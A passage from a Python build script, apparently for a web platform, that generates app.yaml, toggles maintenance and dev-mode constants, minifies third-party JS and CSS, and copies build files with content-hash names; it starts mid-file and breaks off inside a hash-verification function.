FILE_EXTENSIONS_TO_IGNORE = ('.py', '.pyc', '.stylelintrc', '.ts', '.gitkeep')
# Files with these name patterns shouldn't be moved to build directory, and will
# not be served in production. (This includes protractor.js files in
# /extensions.)
JS_FILENAME_SUFFIXES_TO_IGNORE = ('Spec.js', 'protractor.js')
JS_FILENAME_SUFFIXES_NOT_TO_MINIFY = ('.bundle.js',)
GENERAL_FILENAMES_TO_IGNORE = ('.pyc', '.stylelintrc', '.DS_Store')
JS_FILEPATHS_NOT_TO_BUILD = (
os.path.join(
'core', 'templates', 'expressions', 'parser.js'),
os.path.join('extensions', 'ckeditor_plugins', 'pre', 'plugin.js')
)
# These filepaths shouldn't be renamed (i.e. the filepath shouldn't contain
# hash).
# This is because these files don't need cache invalidation, are referenced
# from third party files or should not be moved to the build directory.
# Statically served pages from app.yaml should be here to since they don't
# need cache invalidation.
FILEPATHS_NOT_TO_RENAME = (
'*.py',
'third_party/generated/js/third_party.min.js.map',
'third_party/generated/webfonts/*',
'*.bundle.js',
'*.bundle.js.map',
'webpack_bundles/*',
)
PAGES_IN_APP_YAML = (
'webpack_bundles/about-page.mainpage.html',
'webpack_bundles/contact-page.mainpage.html',
'webpack_bundles/donate-page.mainpage.html',
'webpack_bundles/get-started-page.mainpage.html',
'webpack_bundles/license.mainpage.html',
'webpack_bundles/login-page.mainpage.html',
'webpack_bundles/logout-page.mainpage.html',
'webpack_bundles/partnerships-page.mainpage.html',
'webpack_bundles/privacy-page.mainpage.html',
'webpack_bundles/playbook.mainpage.html',
'webpack_bundles/teach-page.mainpage.html',
'webpack_bundles/terms-page.mainpage.html',
'webpack_bundles/thanks-page.mainpage.html'
)
# NOTE: These pages manage user sessions. Thus, we should never reject or
# replace them when running in maintenance mode; otherwise admins will be unable
# to access the site.
AUTH_PAGE_PATHS = (
'webpack_bundles/login-page.mainpage.html',
'webpack_bundles/logout-page.mainpage.html',
)
# Hashes for files with these paths should be provided to the frontend in
# JS hashes object.
FILEPATHS_PROVIDED_TO_FRONTEND = (
'images/*', 'videos/*', 'i18n/*', '*.component.html',
'*_directive.html', '*.directive.html',
'*.template.html', '*.png', '*.json', '*.webp')
HASH_BLOCK_SIZE = 2**20
APP_DEV_YAML_FILEPATH = 'app_dev.yaml'
APP_YAML_FILEPATH = 'app.yaml'
_PARSER = argparse.ArgumentParser(
description="""
Creates a third-party directory where all the JS and CSS dependencies are
built and stored. Depending on the options passed to the script, might also
minify third-party libraries and/or generate a build directory.
""")
_PARSER.add_argument(
'--prod_env', action='store_true', default=False, dest='prod_env')
_PARSER.add_argument(
'--deploy_mode', action='store_true', default=False, dest='deploy_mode')
_PARSER.add_argument(
'--minify_third_party_libs_only', action='store_true', default=False,
dest='minify_third_party_libs_only')
_PARSER.add_argument(
'--deparallelize_terser',
action='store_true',
default=False,
dest='deparallelize_terser',
help='Disable parallelism on terser plugin in webpack. Use with prod_env.')
_PARSER.add_argument(
'--maintenance_mode',
action='store_true',
default=False,
dest='maintenance_mode',
help=(
'Enable maintenance mode, '
'meaning that only super admins can access the site.'
)
)
_PARSER.add_argument(
'--source_maps',
action='store_true',
default=False,
dest='source_maps',
help='Build webpack with source maps.')
def generate_app_yaml(deploy_mode=False, maintenance_mode=False):
"""Generate app.yaml from app_dev.yaml.
Args:
deploy_mode: bool. Whether the script is being called from deploy
script.
maintenance_mode: bool. Whether the site should be put into
maintenance mode.
"""
prod_file_prefix = 'build/'
maintenance_page_path = 'webpack_bundles/maintenance-page.mainpage.html'
content = '# THIS FILE IS AUTOGENERATED, DO NOT MODIFY\n'
with python_utils.open_file(APP_DEV_YAML_FILEPATH, 'r') as yaml_file:
content += yaml_file.read()
for file_path in PAGES_IN_APP_YAML:
if maintenance_mode and file_path not in AUTH_PAGE_PATHS:
content = content.replace(
file_path, prod_file_prefix + maintenance_page_path)
else:
content = content.replace(
file_path, prod_file_prefix + file_path)
if deploy_mode:
# The version: default line is required to run jobs on a local server (
# both in prod & non-prod env). This line is not required when app.yaml
# is generated during deployment. So, we remove this if the build
# process is being run from the deploy script.
content = content.replace('version: default', '')
# The FIREBASE_AUTH_EMULATOR_HOST environment variable is only needed to
# test locally, and MUST NOT be included in the deployed file.
content = re.sub(' FIREBASE_AUTH_EMULATOR_HOST: ".*"\n', '', content)
if os.path.isfile(APP_YAML_FILEPATH):
os.remove(APP_YAML_FILEPATH)
with python_utils.open_file(APP_YAML_FILEPATH, 'w+') as prod_yaml_file:
prod_yaml_file.write(content)
def modify_constants(
prod_env=False, emulator_mode=True, maintenance_mode=False):
"""Modify constants.ts and feconf.py.
Args:
prod_env: bool. Whether the server is started in prod mode.
emulator_mode: bool. Whether the server is started in emulator mode.
maintenance_mode: bool. Whether the site should be put into
the maintenance mode.
"""
dev_mode_variable = (
'"DEV_MODE": false' if prod_env else '"DEV_MODE": true')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"DEV_MODE": (true|false)',
dev_mode_variable)
emulator_mode_variable = (
'"EMULATOR_MODE": true' if emulator_mode else '"EMULATOR_MODE": false')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"EMULATOR_MODE": (true|false)',
emulator_mode_variable
)
enable_maintenance_mode_variable = (
'ENABLE_MAINTENANCE_MODE = %s' % python_utils.UNICODE(maintenance_mode))
common.inplace_replace_file(
common.FECONF_PATH,
r'ENABLE_MAINTENANCE_MODE = (True|False)',
enable_maintenance_mode_variable)
def set_constants_to_default():
"""Set variables in constants.ts and feconf.py to default values."""
modify_constants(prod_env=False, emulator_mode=True, maintenance_mode=False)
def _minify(source_path, target_path):
"""Runs the given file through a minifier and outputs it to target_path.
Args:
source_path: str. Absolute path to file to be minified.
target_path: str. Absolute path to location where to copy
the minified file.
"""
# The -Xmxn argument is an attempt to limit the max memory used when the
# minification process is running on CircleCI. Note that, from local
# experiments, 18m seems to work, but 12m is too small and results in an
# out-of-memory error.
# https://circleci.com/blog/how-to-handle-java-oom-errors/
# Use relative path to avoid java command line parameter parse error on
# Windows. Convert to posix style path because the java program requires
# the filepath arguments to be in posix path style.
target_path = common.convert_to_posixpath(
os.path.relpath(target_path))
source_path = common.convert_to_posixpath(
os.path.relpath(source_path))
yuicompressor_dir = common.convert_to_posixpath(YUICOMPRESSOR_DIR)
cmd = 'java -Xmx24m -jar %s -o %s %s' % (
yuicompressor_dir, target_path, source_path)
subprocess.check_call(cmd, shell=True)
def write_to_file_stream(file_stream, content):
"""Write to a file object using provided content.
Args:
file_stream: file. A stream handling object to do write operation on.
content: str. String content to write to file object.
"""
file_stream.write(python_utils.UNICODE(content))
def _join_files(source_paths, target_file_stream):
"""Writes multiple files into one file.
Args:
source_paths: list(str). Paths to files to join together.
target_file_stream: file. A stream object of target file.
"""
for source_path in source_paths:
with python_utils.open_file(source_path, 'r') as source_file:
write_to_file_stream(target_file_stream, source_file.read())
def _minify_and_create_sourcemap(source_path, target_file_path):
"""Minifies and generates source map for a JS file. This function is only
meant to be used with third_party.min.js.
Args:
source_path: str. Path to JS file to minify.
target_file_path: str. Path to location of the minified file.
"""
python_utils.PRINT('Minifying and creating sourcemap for %s' % source_path)
source_map_properties = 'includeSources,url=\'third_party.min.js.map\''
cmd = '%s %s %s -c -m --source-map %s -o %s ' % (
common.NODE_BIN_PATH, UGLIFY_FILE, source_path,
source_map_properties, target_file_path)
subprocess.check_call(cmd, shell=True)
def _generate_copy_tasks_for_fonts(source_paths, target_path):
"""Queue up a copy task for each font file.
Args:
source_paths: list(str). Paths to fonts.
target_path: str. Path where the fonts should be copied.
Returns:
deque(Thread). A deque that contains all copy tasks queued to be
processed.
"""
copy_tasks = collections.deque()
for font_path in source_paths:
copy_task = threading.Thread(
target=shutil.copy,
args=(font_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def _insert_hash(filepath, file_hash):
"""Inserts hash into filepath before the file extension.
Args:
filepath: str. Path where the hash should be inserted.
file_hash: str. Hash to be inserted into the path.
Returns:
str. Filepath with hash inserted.
"""
filepath, file_extension = os.path.splitext(filepath)
return '%s.%s%s' % (filepath, file_hash, file_extension)
def ensure_directory_exists(filepath):
"""Ensures if directory tree exists, if not creates the directories.
Args:
filepath: str. Path to file located in directory that we want to ensure
exists.
"""
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
def safe_delete_directory_tree(directory_path):
"""Recursively delete a directory tree. If directory tree does not exist,
create the directories first then delete the directory tree.
Args:
directory_path: str. Directory path to be deleted.
"""
ensure_directory_exists(directory_path)
shutil.rmtree(directory_path)
def _ensure_files_exist(filepaths):
"""Ensures that files exist at the given filepaths.
Args:
filepaths: list(str). Paths to files that we want to ensure exist.
Raises:
OSError. One or more of the files does not exist.
"""
for filepath in filepaths:
if not os.path.isfile(filepath):
raise OSError('File %s does not exist.' % filepath)
def safe_copy_file(source_filepath, target_filepath):
"""Copy a file (no metadata) after ensuring the file exists at the given
source filepath.
NOTE: shutil.copyfile does not accept directory path as arguments.
Args:
source_filepath: str. Path to source file that we want to copy from.
target_filepath: str. Path to target file that we want to copy to.
"""
_ensure_files_exist([source_filepath])
shutil.copyfile(source_filepath, target_filepath)
def safe_delete_file(filepath):
"""Delete a file after ensuring the provided file actually exists.
Args:
filepath: str. Filepath to be deleted.
"""
_ensure_files_exist([filepath])
os.remove(filepath)
def get_file_count(directory_path):
"""Count total number of file in the given directory, ignoring any files
with extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be
built.
Args:
directory_path: str. Directory to be walked.
Returns:
int. Total number of files minus ignored files.
"""
total_file_count = 0
for root, _, filenames in os.walk(directory_path):
for filename in filenames:
# Ignore files with certain extensions.
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
total_file_count += 1
return total_file_count
def _compare_file_count(
first_dir_list, second_dir_list):
"""Ensure that the total count of files in all directories in the first
list matches the count of files in all the directories in the second list.
Args:
first_dir_list: list(str). List of directories to compare.
second_dir_list: list(str). List of directories to compare.
Raises:
ValueError. The source directory list does not have the same file
count as the target directory list.
"""
file_counts = [0, 0]
for first_dir_path in first_dir_list:
file_counts[0] += get_file_count(first_dir_path)
for second_dir_path in second_dir_list:
file_counts[1] += get_file_count(second_dir_path)
if file_counts[0] != file_counts[1]:
python_utils.PRINT(
'Comparing %s vs %s' % (first_dir_list, second_dir_list))
raise ValueError(
'%s files in first dir list != %s files in second dir list' % (
file_counts[0], file_counts[1]))
def process_html(source_file_stream, target_file_stream):
"""Remove whitespaces and add hashes to filepaths in the HTML file stream
object.
Args:
source_file_stream: file. The stream object of the HTML file to be
read from.
target_file_stream: file. The stream object to write the minified HTML
file to.
"""
write_to_file_stream(
target_file_stream, REMOVE_WS(' ', source_file_stream.read()))
def get_dependency_directory(dependency):
"""Get dependency directory from dependency dictionary.
Args:
dependency: dict(str, str). Dictionary representing single dependency
from manifest.json.
Returns:
str. Dependency directory.
"""
if 'targetDir' in dependency:
dependency_dir = dependency['targetDir']
else:
dependency_dir = dependency['targetDirPrefix'] + dependency['version']
return os.path.join(THIRD_PARTY_STATIC_DIR, dependency_dir)
def get_css_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency css filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to css files that need to be copied.
"""
css_files = dependency_bundle.get('css', [])
return [os.path.join(dependency_dir, css_file) for css_file in css_files]
def get_js_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency js filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to js files that need to be copied.
"""
js_files = dependency_bundle.get('js', [])
return [os.path.join(dependency_dir, js_file) for js_file in js_files]
def get_font_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency font filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to font files that need to be copied.
"""
if 'fontsPath' not in dependency_bundle:
# Skip dependency bundles in manifest.json that do not have
# fontsPath property.
return []
fonts_path = dependency_bundle['fontsPath']
# Obtain directory path to /font inside dependency folder.
# E.g. third_party/static/bootstrap-3.3.4/fonts/.
font_dir = os.path.join(dependency_dir, fonts_path)
font_filepaths = []
# Walk the directory and add all font files to list.
for root, _, filenames in os.walk(font_dir):
for filename in filenames:
font_filepaths.append(os.path.join(root, filename))
return font_filepaths
def get_dependencies_filepaths():
"""Extracts dependencies filepaths from manifest.json file into
a dictionary.
Returns:
dict(str, list(str)). A dict mapping file types to lists of filepaths.
The dict has three keys: 'js', 'css' and 'fonts'. Each of the
corresponding values is a full list of dependency file paths of the
given type.
"""
filepaths = {
'js': [],
'css': [],
'fonts': []
}
with python_utils.open_file(MANIFEST_FILE_PATH, 'r') as json_file:
manifest = json.loads(
json_file.read(), object_pairs_hook=collections.OrderedDict)
frontend_dependencies = manifest['dependencies']['frontend']
for dependency in frontend_dependencies.values():
if 'bundle' in dependency:
dependency_dir = get_dependency_directory(dependency)
filepaths['css'].extend(
get_css_filepaths(dependency['bundle'], dependency_dir))
filepaths['js'].extend(
get_js_filepaths(dependency['bundle'], dependency_dir))
filepaths['fonts'].extend(
get_font_filepaths(dependency['bundle'], dependency_dir))
_ensure_files_exist(filepaths['js'])
_ensure_files_exist(filepaths['css'])
_ensure_files_exist(filepaths['fonts'])
return filepaths
def minify_third_party_libs(third_party_directory_path):
"""Minify third_party.js and third_party.css and remove un-minified
files.
"""
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
minified_third_party_js_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)
minified_third_party_css_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)
_minify_and_create_sourcemap(
third_party_js_filepath, minified_third_party_js_filepath)
_minify(third_party_css_filepath, minified_third_party_css_filepath)
# Clean up un-minified third_party.js and third_party.css.
safe_delete_file(third_party_js_filepath)
safe_delete_file(third_party_css_filepath)
def build_third_party_libs(third_party_directory_path):
"""Joins all third party css files into single css file and js files into
single js file. Copies both files and all fonts into third party folder.
"""
python_utils.PRINT(
'Building third party libs at %s' % third_party_directory_path)
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
webfonts_dir = os.path.join(
third_party_directory_path, WEBFONTS_RELATIVE_DIRECTORY_PATH)
dependency_filepaths = get_dependencies_filepaths()
ensure_directory_exists(third_party_js_filepath)
with python_utils.open_file(
third_party_js_filepath, 'w+') as third_party_js_file:
_join_files(dependency_filepaths['js'], third_party_js_file)
ensure_directory_exists(third_party_css_filepath)
with python_utils.open_file(
third_party_css_filepath, 'w+') as third_party_css_file:
_join_files(dependency_filepaths['css'], third_party_css_file)
ensure_directory_exists(webfonts_dir)
_execute_tasks(
_generate_copy_tasks_for_fonts(
dependency_filepaths['fonts'], webfonts_dir))
def build_using_webpack(config_path):
"""Execute webpack build process. This takes all TypeScript files we have in
/templates and generates JS bundles according the require() imports
and also compiles HTML pages into the /backend_prod_files/webpack_bundles
folder. The files are later copied into /build/webpack_bundles.
Args:
config_path: str. Webpack config to be used for building.
"""
python_utils.PRINT('Building webpack')
managed_webpack_compiler = servers.managed_webpack_compiler(
config_path=config_path, max_old_space_size=4096)
with managed_webpack_compiler as p:
p.wait()
def hash_should_be_inserted(filepath):
"""Returns if the file should be renamed to include hash in
the path.
Args:
filepath: str. Path relative to directory we are currently building.
Returns:
bool. True if filepath should contain hash else False.
"""
return not any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_NOT_TO_RENAME)
def should_file_be_built(filepath):
"""Determines if the file should be built.
- JS files: Returns False if filepath matches with pattern in
JS_FILENAME_SUFFIXES_TO_IGNORE or is in JS_FILEPATHS_NOT_TO_BUILD,
else returns True.
- Python files: Returns False if filepath ends with _test.py, else
returns True
- TS files: Returns False.
- Other files: Returns False if filepath matches with pattern in
GENERAL_FILENAMES_TO_IGNORE, else returns True.
Args:
filepath: str. Path relative to file we are currently building.
Returns:
bool. True if filepath should be built, else False.
"""
if filepath.endswith('.js'):
return all(
not filepath.endswith(p) for p in JS_FILENAME_SUFFIXES_TO_IGNORE)
elif filepath.endswith('_test.py'):
return False
elif filepath.endswith('.ts'):
return False
else:
return not any(
filepath.endswith(p) for p in GENERAL_FILENAMES_TO_IGNORE)
def generate_copy_tasks_to_copy_from_source_to_target(
source, target, file_hashes):
"""Generate copy task for each file in source directory, excluding files
with extensions in FILE_EXTENSIONS_TO_IGNORE. Insert hash from hash dict
into the destination filename.
Args:
source: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target: str. Path relative to /oppia directory of directory where
to copy the files and directories.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
deque(Thread). A deque that contains all copy tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Copying into %s' % os.path.join(os.getcwd(), target))
copy_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT('Copying %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
# Python files should not be copied to final build directory.
if not any(
source_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
target_path = source_path
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
relative_path = common.convert_to_posixpath(
os.path.relpath(source_path, source))
if (hash_should_be_inserted(source + relative_path) and
relative_path in file_hashes):
relative_path = (
_insert_hash(relative_path, file_hashes[relative_path]))
target_path = os.path.join(os.getcwd(), target, relative_path)
ensure_directory_exists(target_path)
copy_task = threading.Thread(
target=safe_copy_file,
args=(source_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def is_file_hash_provided_to_frontend(filepath):
"""Returns if the hash for the filepath should be provided to the frontend.
Args:
filepath: str. Relative path to the file.
Returns:
bool. True if file hash should be provided to the frontend else False.
"""
return any(
fnmatch.fnmatch(filepath, pattern) for pattern
in FILEPATHS_PROVIDED_TO_FRONTEND)
def generate_md5_hash(filepath):
"""Returns md5 hash of file.
Args:
filepath: str. Absolute path to the file.
Returns:
str. Hexadecimal hash of specified file.
"""
m = hashlib.md5()
with python_utils.open_file(filepath, 'rb', encoding=None) as f:
while True:
buf = f.read(HASH_BLOCK_SIZE)
if not buf:
break
m.update(buf)
return m.hexdigest()
def get_filepaths_by_extensions(source_dir, file_extensions):
"""Return list of filepaths in a directory with certain extensions,
excluding filepaths that should not be built.
Args:
source_dir: str. Root directory to be walked.
file_extensions: tuple(str). Tuple of file extensions.
Returns:
list(str). List of filepaths with specified extensions.
"""
filepaths = []
for root, _, filenames in os.walk(source_dir):
for filename in filenames:
filepath = os.path.join(root, filename)
relative_filepath = os.path.relpath(filepath, source_dir)
if should_file_be_built(filepath) and any(
filename.endswith(p) for p in file_extensions):
filepaths.append(relative_filepath)
return filepaths
def get_file_hashes(directory_path):
"""Returns hashes of all files in directory tree, excluding files with
extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be built.
Args:
directory_path: str. Root directory of the tree.
Returns:
dict(str, str). Dictionary with keys specifying file paths and values
specifying file hashes.
"""
file_hashes = dict()
python_utils.PRINT(
'Computing hashes for files in %s'
% os.path.join(os.getcwd(), directory_path))
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), directory_path)):
for filename in filenames:
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# The path in hashes.json file is in posix style,
# see the comment above HASHES_JSON_FILENAME for details.
complete_filepath = common.convert_to_posixpath(
os.path.join(root, filename))
relative_filepath = common.convert_to_posixpath(os.path.relpath(
complete_filepath, directory_path))
file_hashes[relative_filepath] = generate_md5_hash(
complete_filepath)
return file_hashes
def filter_hashes(file_hashes):
"""Filters hashes that should be provided to the frontend
and prefixes "/" in front of the keys.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
dict(str, str). Filtered dictionary of only filepaths that should be
provided to the frontend.
"""
filtered_hashes = dict()
for filepath, file_hash in file_hashes.items():
if is_file_hash_provided_to_frontend(filepath):
filtered_hashes['/' + filepath] = file_hash
return filtered_hashes
def save_hashes_to_file(file_hashes):
"""Return JS code that loads hashes needed for frontend into variable.
Args:
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Returns:
str. JS code loading hashes as JSON into variable.
"""
# Only some of the hashes are needed in the frontend.
filtered_hashes = filter_hashes(file_hashes)
ensure_directory_exists(HASHES_JSON_FILEPATH)
with python_utils.open_file(HASHES_JSON_FILEPATH, 'w+') as hashes_json_file:
hashes_json_file.write(
python_utils.UNICODE(
json.dumps(filtered_hashes, ensure_ascii=False)))
hashes_json_file.write(u'\n')
def minify_func(source_path, target_path, filename):
"""Call the appropriate functions to handle different types of file
formats:
- HTML files: Remove whitespaces, interpolates paths in HTML to include
hashes in source directory and save edited file at target directory.
- CSS or JS files: Minify and save at target directory.
- Other files: Copy the file from source directory to target directory.
"""
skip_minify = any(
filename.endswith(p) for p in JS_FILENAME_SUFFIXES_NOT_TO_MINIFY)
if filename.endswith('.html'):
python_utils.PRINT('Building %s' % source_path)
with python_utils.open_file(source_path, 'r+') as source_html_file:
with python_utils.open_file(
target_path, 'w+') as minified_html_file:
process_html(source_html_file, minified_html_file)
elif ((filename.endswith('.css') or filename.endswith('.js')) and
not skip_minify):
python_utils.PRINT('Minifying %s' % source_path)
_minify(source_path, target_path)
else:
python_utils.PRINT('Copying %s' % source_path)
safe_copy_file(source_path, target_path)
def _execute_tasks(tasks, batch_size=24):
"""Starts all tasks and checks the results.
Runs no more than 'batch_size' tasks at a time.
"""
remaining_tasks = collections.deque(tasks)
currently_running_tasks = []
while remaining_tasks or currently_running_tasks:
if currently_running_tasks:
for task in collections.deque(currently_running_tasks):
if not task.is_alive():
currently_running_tasks.remove(task)
while remaining_tasks and len(currently_running_tasks) < batch_size:
task = remaining_tasks.popleft()
currently_running_tasks.append(task)
try:
task.start()
except RuntimeError:
raise OSError('threads can only be started once')
def generate_build_tasks_to_build_all_files_in_directory(source, target):
"""This function queues up tasks to build all files in a directory,
excluding files that should not be built.
Args:
source: str. Path relative to /oppia of directory containing source
files and directories to be built.
target: str. Path relative to /oppia of directory where the built files
and directories will be saved to.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
python_utils.PRINT('Processing %s' % os.path.join(os.getcwd(), source))
python_utils.PRINT('Generating into %s' % os.path.join(os.getcwd(), target))
build_tasks = collections.deque()
for root, dirnames, filenames in os.walk(os.path.join(os.getcwd(), source)):
for directory in dirnames:
python_utils.PRINT(
'Building directory %s' % os.path.join(root, directory))
for filename in filenames:
source_path = os.path.join(root, filename)
target_path = source_path.replace(source, target)
ensure_directory_exists(target_path)
if should_file_be_built(source_path):
task = threading.Thread(
target=minify_func,
args=(source_path, target_path, filename,))
build_tasks.append(task)
return build_tasks
def generate_build_tasks_to_build_files_from_filepaths(
source_path, target_path, filepaths):
"""This function queues up build tasks to build files from a list of
filepaths, excluding files that should not be built.
Args:
source_path: str. Path relative to /oppia directory of directory
containing files and directories to be copied.
target_path: str. Path relative to /oppia directory of directory where
to copy the files and directories.
filepaths: list(str). List of filepaths to be built.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
build_tasks = collections.deque()
for filepath in filepaths:
source_file_path = os.path.join(source_path, filepath)
target_file_path = os.path.join(target_path, filepath)
ensure_directory_exists(target_file_path)
if should_file_be_built(source_file_path):
task = threading.Thread(
target=minify_func,
args=(
source_file_path, target_file_path, filepath,))
build_tasks.append(task)
return build_tasks
def generate_delete_tasks_to_remove_deleted_files(
source_dir_hashes, staging_directory):
"""This function walks the staging directory and queues up deletion tasks to
remove files that are not in the hash dict i.e. remaining files in staging
directory that have since been deleted from source directory. Files with
extensions in FILE_EXTENSIONS_TO_IGNORE will be excluded.
Args:
source_dir_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
staging_directory: str. Path relative to /oppia directory of directory
containing files and directories to be walked.
Returns:
deque(Thread). A deque that contains all delete tasks
queued to be processed.
"""
python_utils.PRINT(
'Scanning directory %s to remove deleted file' % staging_directory)
delete_tasks = collections.deque()
for root, _, filenames in os.walk(
os.path.join(os.getcwd(), staging_directory)):
for filename in filenames:
target_path = os.path.join(root, filename)
# Ignore files with certain extensions.
if not any(
target_path.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
# On Windows the path is on Windows-Style, while the path in
# hashes is in posix style, we need to convert it so the check
# can run correctly.
relative_path = common.convert_to_posixpath(
os.path.relpath(target_path, staging_directory))
# Remove file found in staging directory but not in source
# directory, i.e. file not listed in hash dict.
if relative_path not in source_dir_hashes:
python_utils.PRINT(
'Unable to find %s in file hashes, deleting file'
% target_path)
task = threading.Thread(
target=safe_delete_file, args=(target_path,))
delete_tasks.append(task)
return delete_tasks
def get_recently_changed_filenames(source_dir_hashes, out_dir):
"""Compare hashes of source files and built files. Return a list of
filenames that were recently changed. Skips files that are not supposed to
built or already built.
Args:
source_dir_hashes: dict(str, str). Dictionary of hashes of files
to be built.
out_dir: str. Path relative to /oppia where built files are located.
Returns:
list(str). List of filenames expected to be re-hashed.
"""
# Hashes are created based on files' contents and are inserted between
# the filenames and their extensions,
# e.g base.240933e7564bd72a4dde42ee23260c5f.html
# If a file gets edited, a different MD5 hash is generated.
recently_changed_filenames = []
# Currently, Python files and HTML files are always re-built.
file_extensions_not_to_track = ('.html', '.py',)
for filename, md5_hash in source_dir_hashes.items():
# Skip files that are already built or should not be built.
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in file_extensions_not_to_track):
final_filepath = _insert_hash(
os.path.join(out_dir, filename), md5_hash)
if not os.path.isfile(final_filepath):
# Filename with provided hash cannot be found, this file has
# been recently changed or created since last build.
recently_changed_filenames.append(filename)
if recently_changed_filenames:
python_utils.PRINT(
'The following files will be rebuilt due to recent changes: %s'
% recently_changed_filenames)
return recently_changed_filenames
def generate_build_tasks_to_build_directory(dirnames_dict):
"""This function queues up build tasks to build all files in source
directory if there is no existing staging directory. Otherwise, selectively
queue up build tasks to build recently changed files.
Args:
dirnames_dict: dict(str, str). This dict should contain three keys,
with corresponding values as follows:
- 'dev_dir': the directory that contains source files to be built.
- 'staging_dir': the directory that contains minified files waiting
for final copy process.
- 'out_dir': the final directory that contains built files with hash
inserted into filenames.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
source_dir = dirnames_dict['dev_dir']
staging_dir = dirnames_dict['staging_dir']
out_dir = dirnames_dict['out_dir']
build_tasks = collections.deque()
if not os.path.isdir(staging_dir):
# If there is no staging dir, perform build process on all files.
python_utils.PRINT('Creating new %s folder' % staging_dir)
ensure_directory_exists(staging_dir)
build_tasks += generate_build_tasks_to_build_all_files_in_directory(
source_dir, staging_dir)
else:
# If staging dir exists, rebuild all HTML and Python files.
file_extensions_to_always_rebuild = ('.html', '.py',)
python_utils.PRINT(
'Staging dir exists, re-building all %s files'
% ', '.join(file_extensions_to_always_rebuild))
filenames_to_always_rebuild = get_filepaths_by_extensions(
source_dir, file_extensions_to_always_rebuild)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, filenames_to_always_rebuild)
dev_dir_hashes = get_file_hashes(source_dir)
source_hashes = {}
source_hashes.update(dev_dir_hashes)
# Clean up files in staging directory that cannot be found in file
# hashes dictionary.
_execute_tasks(generate_delete_tasks_to_remove_deleted_files(
source_hashes, staging_dir))
python_utils.PRINT(
'Getting files that have changed between %s and %s'
% (source_dir, out_dir))
recently_changed_filenames = get_recently_changed_filenames(
dev_dir_hashes, out_dir)
if recently_changed_filenames:
python_utils.PRINT(
'Re-building recently changed files at %s' % source_dir)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, recently_changed_filenames)
else:
python_utils.PRINT(
'No changes detected. Using previously built files.')
return build_tasks
def _verify_filepath_hash(relative_filepath, file_hashes):
"""Ensure that hashes in filepaths match with the hash entries in hash
dict.
Args:
relative_filepath: str. Filepath that is relative from /build.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Raises:
ValueError. The hash dict is empty.
ValueError. Filepath has less than 2 partitions after splitting by '.'
delimiter.
ValueError. The filename does not contain hash.
KeyError. The filename's hash cannot be found in the hash dict.
"""
# Final filepath example:
# pages/base.240933e7564bd72a4dde42ee23260c5f.html.
if not file_hashes:
raise ValueError('Hash dict is empty')
filename_partitions = relative_filepath.split('.')
if len(filename_partitions) < 2:
raise ValueError('Filepath has less than 2 partitions after splitting')
hash_string_from_filename = filename_partitions[-2]
# Ensure hash string obtained from filename follows MD5 hash format.
if not re.search(r'([a-fA-F\d]{32})', relative_filepath):
